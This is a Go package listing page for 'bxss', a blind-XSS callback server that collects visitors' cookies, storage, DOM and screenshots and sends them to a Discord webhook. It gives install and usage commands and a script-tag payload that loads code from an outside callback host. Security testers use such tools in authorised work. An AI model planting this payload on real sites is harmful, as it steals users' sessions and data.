bxss

command module
v1.4.0 Latest Latest
Warning

This package is not in the latest version of its module.

 Go to latest Published: Jul 9, 2025 License: MIT Imports: 13 Imported by: 0

README

BXss - Blind XSS Callback Server

A Go server for Blind XSS testing. Serves a payload on any path and collects browser data (cookies, storage, DOM, screenshot) via callback, sending results to a Discord webhook and saving locally.

Install

go install github.com/0xRTH/bxss@latest

Usage

bxss -webhook https://discord.com/api/webhooks/YOUR_WEBHOOK -domain yourdomain.com -p 8083
  • -webhook (required): Discord webhook URL
  • -domain (optional): Domain for callback URL (default: localhost)
  • -p (optional): Port to run the server on (default: 8083)
  • -v (optional): Verbose logging

Example Payload

Add this to any page:

<script src="http://yourdomain.com:8083/test"></script>

MIT License

Documentation

The Go Gopher

There is no documentation for this package.

Source Files

View all Source files

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL
go.dev uses cookies from Google to deliver and enhance the quality of its services and to analyze traffic. Learn more.